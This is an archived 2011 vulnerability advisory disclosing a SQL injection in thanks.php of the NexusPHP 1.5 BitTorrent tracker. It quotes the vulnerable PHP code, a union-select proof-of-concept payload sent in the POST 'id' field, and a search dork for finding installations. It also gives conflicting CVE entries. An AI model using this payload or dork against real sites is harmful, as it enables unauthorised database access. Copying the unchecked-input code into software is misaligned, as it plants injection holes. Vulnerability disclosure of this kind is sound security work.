NexusPHP 1.5 SQL Injection

2011-10-09 / 2011-10-10
Credit: flyh4t
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intitle:nexusphp

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability # Google Dork: intitle:nexusphp # Date: 2011-10-08 # Author: flyh4t # Software Link: http://sourceforge.net/projects/nexusphp/ # Version: nexusphp.v1.5 # Tested on: linux+apache # CVE : CVE-2011-4026 Nexusphp is BitTorrent private tracker scripts written in PHP The codes is here http://sourceforge.net/projects/nexusphp/ There is a sql injectiong Vulnerability in thanks.php. -----------------------vul code------------------- //thanks.php if ($_GET['id']) stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!"); $userid = $CURUSER["id"]; $torrentid = $_POST["id"]; $tsql = sql_query("SELECT owner FROM torrents where id=$torrentid"); $arr = mysql_fetch_array($tsql); -----------------------vul code end------------------- $_POST["id"] is not checked, lead a sql injection Vulnerability -----------------------exploit------------------- _POST[id] : -1 union select version()>4/* -----------------------exploit end -------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top